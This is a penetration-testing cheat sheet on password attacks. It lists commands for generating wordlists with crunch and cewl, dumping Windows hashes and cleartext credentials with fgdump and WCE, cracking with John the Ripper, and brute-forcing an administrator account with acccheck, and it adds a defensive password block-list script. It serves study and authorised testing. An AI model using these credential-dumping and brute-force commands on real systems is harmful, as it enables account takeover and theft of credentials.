# Password Attacks

## Password Attacks are based on:

1. Guess
2. Brute-force
3. Dictionary

### Crunch

```
man crunch 
ls -la /usr/share/crunch/charset.lst 

crunch 6 6 0123456789ABCDEF -o list.txt
# Create a list of 6-character passwords using the characters 0-F and save it to a file

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt
# 4-character passwords using the predefined mixalpha charset from the crunch charset list

crunch 8 8 -t ,@@^^%%% | more
# Pattern: , = uppercase, @ = lowercase, ^ = symbol, % = digit
# Produces passwords similar to Abc$#123, Jud()666, Hol&&278
```

### PWdump/FGdump

You need admin access to run these two tools.

```
fgdump.exe 
# Run it. Dumps the hashes to a file to be used and cracked later 

type 127.0.0.1.pwdump 
# Access the contents of the file generated from fgdump.exe command
```

### WCE (Windows Credential Editor)

Requires admin access.

```
wce64.exe -w
# Run it. Dumps passwords in clear text
```

### John the Ripper

```
john hashes.txt 
# Run it. Cracks the password hashes on Kali Linux using a dictionary/brute-force attack (may take a long time)
```

### Password Profiling

Collect words and phrases associated with the organisation and include them in the wordlist (e.g. 33 Company uses thirtythree password combinations).

```
# Tool: cewl - creates password candidates from words/phrases found on a website

cewl www.domain.com -m 6 -w /root/domain-cel.txt
# Writes words of at least 6 characters (-m 6) found on the site to a wordlist file (-w)
```

In combination with John the Ripper

```
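vi /etc/john/john.conf
# Add this rule under [List.Rules:Wordlist]; it appends two digits to each word:
$[0-9]$[0-9]
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
# Applies the rules to the wordlist and writes the mutated candidates to mutated.txt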
```
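Seen from the defending side, the profiling step above defines a set of passwords that should be refused at password-change time: any word of six or more letters from the organisation's public site, bare or followed by one or two digits (a superset of what the `$[0-9]$[0-9]` rule produces). The check below is an added example, not part of the original page; the function names, the sample site text and the candidate passwords are constructed for illustration.

```python
import re

MIN_WORD_LEN = 6  # mirrors the `-m 6` minimum word length passed to cewl above

# Constructed sample standing in for text scraped from the organisation's site.
SAMPLE_SITE_TEXT = "Welcome to Megacorp. Our nanotechnology division ships worldwide."


def build_blocklist(site_text, min_len=MIN_WORD_LEN):
    """Collect lowercase words of at least min_len letters from site text."""
    words = re.findall(r"[A-Za-z]+", site_text)
    return {w.lower() for w in words if len(w) >= min_len}


def profiled_base(candidate, blocklist):
    """Return the site word a candidate password is built on, or None.

    Matches the bare word and the word plus one or two trailing digits,
    compared case-insensitively.
    """
    match = re.fullmatch(r"(.+?)([0-9]{0,2})", candidate)
    if not match:
        return None
    base = match.group(1).lower()
    return base if base in blocklist else None


def audit(candidates, blocklist):
    """Map each candidate that must be rejected to the word it derives from."""
    rejected = {}
    for candidate in candidates:
        base = profiled_base(candidate, blocklist)
        if base is not None:
            rejected[candidate] = base
    return rejected


if __name__ == "__main__":
    blocklist = build_blocklist(SAMPLE_SITE_TEXT)
    # Constructed candidate passwords, as submitted to a password-change form.
    proposed = ["Megacorp42", "nanotechnology07", "Division5",
                "megacorp123", "T7#vqLw!x2", "ships99"]
    for password, word in audit(proposed, blocklist).items():
        print(f"reject {password!r}: derived from site word {word!r}")
```

Three-digit suffixes such as `megacorp123` fall outside the two-digit rule and are not flagged here; widen the suffix pattern if the policy should cover them.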

### Brute force password attack on administrator.

```
acccheck -v -t 10.10.10.10 -u administrator -P /usr/share/dirb/wordlists/common.txt
```

### Reference

{% embed url="<http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats>" %}
